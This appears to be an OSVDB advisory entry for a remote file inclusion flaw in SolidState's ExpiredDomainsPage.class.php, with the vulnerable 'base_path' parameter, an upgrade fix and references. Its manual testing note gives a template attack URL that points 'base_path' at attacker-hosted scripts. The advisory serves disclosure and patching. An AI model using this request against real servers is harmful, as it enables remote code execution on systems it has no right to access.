SolidState ExpiredDomainsPage.class.php base_path Variable Remote File Inclusion

2006-09-21T15:48:52
ID OSVDB:31113
Type osvdb
Reporter Kacper(kacper1964@yahoo.pl)
Modified 2006-09-21T15:48:52

Description

Vulnerability Description

SolidState contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to ExpiredDomainsPage.class.php not properly sanitizing user input supplied to the 'base_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Upgrade to version 0.4.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

SolidState contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to ExpiredDomainsPage.class.php not properly sanitizing user input supplied to the 'base_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[path]/manager/pages/ExpiredDomainsPage.class.php?base_path=[evil_scripts]

References:

Vendor URL: http://www.solid-state.org/ Vendor Specific News/Changelog Entry: http://www.solid-state.org/index.php?name=PNphpBB2&file=portal&article=1&sid=60d164e325a32a0a56ed5e7b481f305a Mail List Post: http://attrition.org/pipermail/vim/2007-January/001210.html ISS X-Force ID: 29095 Generic Exploit URL: http://www.milw0rm.com/exploits/2413 CVE-2006-5020